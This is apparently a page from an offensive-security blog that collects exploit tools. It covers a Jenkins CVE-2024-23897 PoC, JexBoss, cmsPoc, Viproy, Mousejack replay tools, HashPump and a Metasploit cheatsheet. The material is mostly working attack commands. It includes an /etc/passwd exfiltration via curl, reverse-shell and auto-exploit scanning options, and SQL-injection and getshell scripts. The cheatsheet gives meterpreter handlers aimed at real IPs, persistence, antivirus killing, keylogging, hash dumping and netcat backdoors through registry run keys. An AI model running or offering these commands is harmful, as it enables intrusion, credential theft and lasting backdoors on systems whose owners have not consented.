Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts

Wednesday, March 13, 2024

CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner


Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.


Usage

Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

python CVE-2024-23897.py -t <target> -p <port> -f <file>

or

python CVE-2024-23897.py -i <input_file> -f <file>

Parameters: - -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block. - -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line). - -o or --output-file: Export results to file (optional). - -p or --port: Specify the port number. Default is 8080 (optional). - -f or --file: Specify the file to read on the target system.


Changelog

[27th January 2024] - Feature Request
  • Added scanning/exploiting via input file with hosts (-i INPUT_FILE).
  • Added export to file (-o OUTPUT_FILE).

[26th January 2024] - Initial Release
  • Initial release.

Contributing

Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Author

Alexander Hagenah - URL - Twitter


Disclaimer

This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.


Share:

Saturday, January 27, 2018

JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool - JexBoss

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

Requirements

Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:
  • Download and install Python
  • Download and install Git for Windows
  • After installing, run the Git for Windows and type the following commands:
    PATH=$PATH:C:\Python27\
    PATH=$PATH:C:\Python27\Scripts
    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

Features
The tool and exploits were developed and tested for:
  • JBoss Application Server versions: 3, 4, 5 and 6.
  • Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
  • /admin-console
    • tested and working in JBoss versions 5 and 6
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4, 5 and 6
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4, 5 and 6
  • Application Deserialization
    • tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
  • Servlet Deserialization
    • tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
  • Apache Struts2 CVE-2017-5638
    • tested in Apache Struts 2 applications
  • Others

Videos
  • Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

  • Exploiting JBoss Application Server with JexBoss

  • Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)


Screenshots
  • Simple usage examples:
$ python jexboss.py


  • Example of standalone mode against JBoss:
$ python jexboss.py -u http://192.168.0.26:8080


  • Usage modes:
$ python jexboss.py -h
  • Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt


  • Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt


  • Results and recommendations:


Reverse Shell (meterpreter integration)
After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
   jexremote=YOUR_IP:YOUR_PORT

   Example:
     Shell>jexremote=192.168.0.10:4444
  • Example:

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

Usage examples
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl [email protected]/etc/passwd http://your_server'
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
  • For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
  • For Apache Struts 2 (CVE-2017-5638)
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
  • For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
  • Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
  • File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
  • More Options:
optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                        PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates
                        performed by the webshell in exploited server at
                        http://webshell.jexboss.net/jsp_version.txt and 2)
                        check for updates performed by the jexboss client at
                        http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP
                        parameters (eg. javax.faces.ViewState, oldFormData,
                        etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in
                        Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector.
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                        (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                        checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P
                        http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in
                        JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)

Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u
                        http://192.168.0.10:8080)

Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when
                        exploiting Java Deserialization Vulnerabilities in
                        application layer (for now, working only against *nix
                        systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                        @/etc/passwd http://your_server)
  --windows, -w         Specifies that the commands are for rWINDOWS System$
                        (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized
                        objects into it. (egs. -H javax.faces.ViewState or -H
                        oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                        javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        Specify the type of Gadget to generate the payload
                        automatically. (DEFAULT: commons-collections3.1 or
                        groovy1 for JenKins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized
                        object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in
                        -u parameter. This will send the payload in multiple
                        formats (eg. RAW, GZIPED and BASE64) and with
                        different Content-Types.

Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for
                        each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results

File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                        line)
  -out FILENAME_RESULTS
                        File name to store the file scan results


Share:

Sunday, January 7, 2018

A CMS Exploit Framework - cmsPoc



A CMS Exploit Framework.

Requirements
  • python2.7
  • Works on Linux, Windows

Usage
usage: cmspoc.py [-h]
 -t TYPE -s SCRIPT -u URL

optional arguments:
  -h, --help            show this help message and exit
  -t TYPE, --type TYPE  e.g.,phpcms
  -s SCRIPT, --script SCRIPT
                        Select script
  -u URL, --url URL     Input a target url

Examples
python cmspoc.py -t phpcms -s v960_sqlinject_getpasswd -u http://10.10.10.1:2500/phpcms960


Scripts
TYPE SCRIPT DESCRIPTION
phpcms v960_sqlinject_getpasswd phpcmsv9.6.0 wap模块 sql注入 获取passwd
icms v701_sqlinject_getadmin icmsv7.0.1 admincp.php sql注入 后台任意登陆
discuz v34_delete_arbitary_files discuz ≤ v3.4 任意文件删除
beecms v40_fileupload_getshell beecms ≤ V4.0_R_20160525 文件上传漏洞


Share:

Thursday, July 27, 2017

VoIP Penetration Testing and Exploitation Kit - Viproy



Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current Version and Updates
Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Homepage of Project
http://viproy.com

Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken
https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken
https://www.youtube.com/watch?v=rl_kp5UZKlw

DEF CON 24 - VoIP Wars: The Live Workshop
To be added later

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync
http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version
https://youtu.be/TMdiXYzY8qY

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck
http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop
https://youtu.be/hwDD7K9oXeI

Black Hat USA 2014 / DEF CON 22 - VoIP Wars: Attack of the Cisco Phones
https://www.youtube.com/watch?v=hqL25srtoEY

DEF CON 21 - VoIP Wars: Return of the SIP
https://www.youtube.com/watch?v=d6cGlTB6qKw

Attacking SIP/VoIP Servers Using Viproy
https://www.youtube.com/watch?v=AbXh_L0-Y5A

Current Testing Modules
  • SIP Register
  • SIP Invite
  • SIP Message
  • SIP Negotiate
  • SIP Options
  • SIP Subscribe
  • SIP Enumerate
  • SIP Brute Force
  • SIP Trust Hacking
  • SIP UDP Amplification DoS
  • SIP Proxy Bounce
  • Skinny Register
  • Skinny Call
  • Skinny Call Forward
  • CUCDM Call Forwarder
  • CUCDM Speed Dial Manipulator
  • MITM Proxy TCP
  • MITM Proxy UDP
  • Cisco CDP Spoofer
  • Boghe VoIP Client INVITE PoC Exploit (New)
  • Boghe VoIP Client MSRP PoC Exploit (New)
  • SIP Message with INVITE Support (New)
  • Sample SIP SDP Fuzzer (New)
  • MSRP Message Tester with SIP INVITE Support (New)
  • Sample MSRP Message Fuzzer with SIP INVITE Support (New)
  • Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation
Copy "lib" and "modules" folders' content to Metasploit root directory.
Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) should contains the following lines
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'

Usage of SIP Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SIPUSAGE.md

Usage of Skinny Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SKINNYUSAGE.md

Usage of Auxiliary Viproy Modules
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md


Share:

Tuesday, July 18, 2017

Metasploit Cheatsheet




Metasploit Cheatsheet


Cheat sheet of Metasploit… Commands are as follows..

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false

# set AutoRunScript pathto script you want to autorun after exploit is run

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
exploit -j -z

# file_autopwn

rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

# shows all the scripts

run

# persistence! broken …if you use DNS name ..

run persistence -r 75.139.158.51 -p 21 -A -X -i 30
run get_pidgin_creds
idletime
sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )

migrate 376
shell

# session hijack tokens

use incognito
impersonate_token “NT AUTHORITY\\SYSTEM”

# escalate to system

use priv
getsystem
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list top used apps

run prefetchtool -x 20

# list installed apps

run prefetchtool -p
run get_local_subnets

# find and download files

run search_dwld “%USERPROFILE%\\my documents” passwd
run search_dwld “%USERPROFILE%\\desktop passwd
run search_dwld “%USERPROFILE%\\my documents” office
run search_dwld “%USERPROFILE%\\desktop” office

# alternate

download -r “%USERPROFILE%\\desktop” ~/
download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc

run winenum

# rev shell the hard way

run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4
run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

# vnc / port fwd for linux

run vnc

# priv esc

run kitrap0d
run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!

run killav
run winemun
run memdump
run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”

getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

run msf_bind
run msf_bind -p 1975
rev2self
getuid

getuid

enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script

run winbf -h

# upload a script or executable and run it

uploadexec

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f
at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”
SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory still … 

Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy


Offsec 
Share:

Saturday, June 24, 2017

Wireless Mouse/Keyboard Attack With Replay/Transmit PoC - Mousejack Transmit


This is code extending the mousejack tools https://github.com/RFStorm/mousejack.
Replay/transmit tools have been added to the original tools.
POC packets based on a Logitech Wireless Combo MK220 which consists of a K220 wireless keyboard and an M150 wireless mouse are included in the logs folder.
More details available here https://www.ckn.io/blog/2016/07/09/hijacking-wireless-mice-and-keyboards/

Scanner
Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets.
usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL]

optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles)
  -p PREFIX, --prefix PREFIX          Promiscuous mode address prefix
  -d DWELL, --dwell DWELL             Dwell time per channel, in milliseconds
Scan for devices on channels 1-5
./nrf24-scanner.py -c {1..5}
Scan for devices with an address starting in 0xA9 on all channels
./nrf24-scanner.py -p A9

Sniffer
Device following sniffer, which follows a specific nRF24 device as it hops, and prints out decoded Enhanced Shockburst packets from the device. This version has also been modified to log the packets to a log file
usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -o OUTPUT [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o OUTPUT, --output OUTPUT                 Output file to log the packets
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]
Sniff packets from address 8C:D3:0F:3E:B4 on all channels and save them to output.log
./nrf24-sniffer.py -a 8C:D3:0F:3E:B4 -o logs/output.log

Replay/transmit
Replay captured packets or transmit generated ones. It follows a specific nRF24 device as it hops, and sends packets from a log file.
usage: ./nrf24-replay.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -i INPUT_FILE [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o INPUT_FILE, --input INPUT_FILE          Input file that has the packets to sned
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]
Send packets from file keystroke.log to address 8C:D3:0F:3E:B4 on hopping channel
./nrf24-replay.py -a 8C:D3:0F:3E:B4 -i logs/keystroke.log

Network mapper
Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list.
usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES]

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Known address
  -p PASSES, --passes PASSES                 Number of passes (default 2)
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]
Map the star network that address 61:49:66:82:03 belongs to
./nrf24-network-mapper.py -a 61:49:66:82:03

Continuous tone test
The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels.
This script will cause the transceiver to transmit a tone on the first channel that is passed in.
usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N ...]] [-v] [-l]

optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles)
Transmit a continuous tone at 2405MHz
./nrf24-continuous-tone-test.py -c 5

Packet generator script
This uses a dictionary to map keyboard presses to the equivalent packets. It reads stdin input and logs the mapped packets to logs/keystrokes.log. It will accept input until Ctrl+C is pressed.
usage: ./keymapper.py 

Log files
The folder logs contains various pre-saved packets for various keyboard operations.
Shell.log is for exploitation of a Windows machine by running a powershell one-liner which connects back to the attacker machine.
The file keys.log serves as a reference where various key presses and combinations are mapped to their equivalent packets.

Demo
A demo of exploiting a Windows machine:


Share:

A Tool To Exploit The Hash Length Extension Attack In Various Hashing Algorithms - HashPump


A tool to exploit the hash length extension attack in various hashing algorithms.
Currently supported algorithms: MD5, SHA1, SHA256, SHA512.

Help Menu
$ hashpump -h
HashPump [-h help] [-t test] [-s signature] [-d data] [-a additional] [-k keylength]
    HashPump generates strings to exploit signatures vulnerable to the Hash Length Extension Attack.
    -h --help          Display this message.
    -t --test          Run tests to verify each algorithm is operating properly.
    -s --signature     The signature from known message.
    -d --data          The data from the known message.
    -a --additional    The information you would like to add to the known message.
    -k --keylength     The length in bytes of the key being used to sign the original message with.
    Version 1.2.0 with CRC32, MD5, SHA1, SHA256 and SHA512 support.
    <Developed by bwall(@botnet_hunter)>

Sample Output
$ hashpump -s '6d5f807e23db210bc254a28be2d6759a0f5f5d99' --data 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' -a '&waffle=liege' -k 14
0e41270260895979317fff3898ab85668953aaa2
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege

Compile & install
$ git clone https://github.com/bwall/HashPump.git
$ apt-get install g++ libssl-dev
$ cd HashPump
$ make
$ make install
apt-get and make install require root privileges to run correctly. The actual requirement is for -lcrypto, so depending on your operating system, your dependencies may vary.
On OS X HashPump can also be installed using Homebrew:
$ brew install hashpump

Mentions
HashPump has been mentioned in a few write-ups. If you are wondering how you can use HashPump, these are some great examples.

Python Bindings
Fellow Python lovers will be pleased with this addition. Saving me from writing an implementation of all these hash algorithms with the ability to modify states in Python, Python bindings have been added in the form of hashpumpy. This addition comes from zachriggle.

Installation
These Python bindings are available on PyPI and can be installed via pip. pip install hashpumpy

Usage
>>> import hashpumpy
>>> help(hashpumpy.hashpump)
Help on built-in function hashpump in module hashpumpy:

hashpump(...)
    hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)

    Arguments:
        hexdigest(str):      Hex-encoded result of hashing key + original_data.
        original_data(str):  Known data used to get the hash result hexdigest.
        data_to_add(str):    Data to append
        key_length(int):     Length of unknown data prepended to the hash

    Returns:
        A tuple containing the new hex digest and the new message.
>>> hashpumpy.hashpump('ffffffff', 'original_data', 'data_to_add', len('KEYKEYKEY'))
('e3c4a05f', 'original_datadata_to_add')

Python 3 note
hashpumpy supports Python 3. Different from the Python 2 version, the second value (the new message) in the returned tuple from hashpumpy.hashpump is a bytes-like object instead of a string.


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition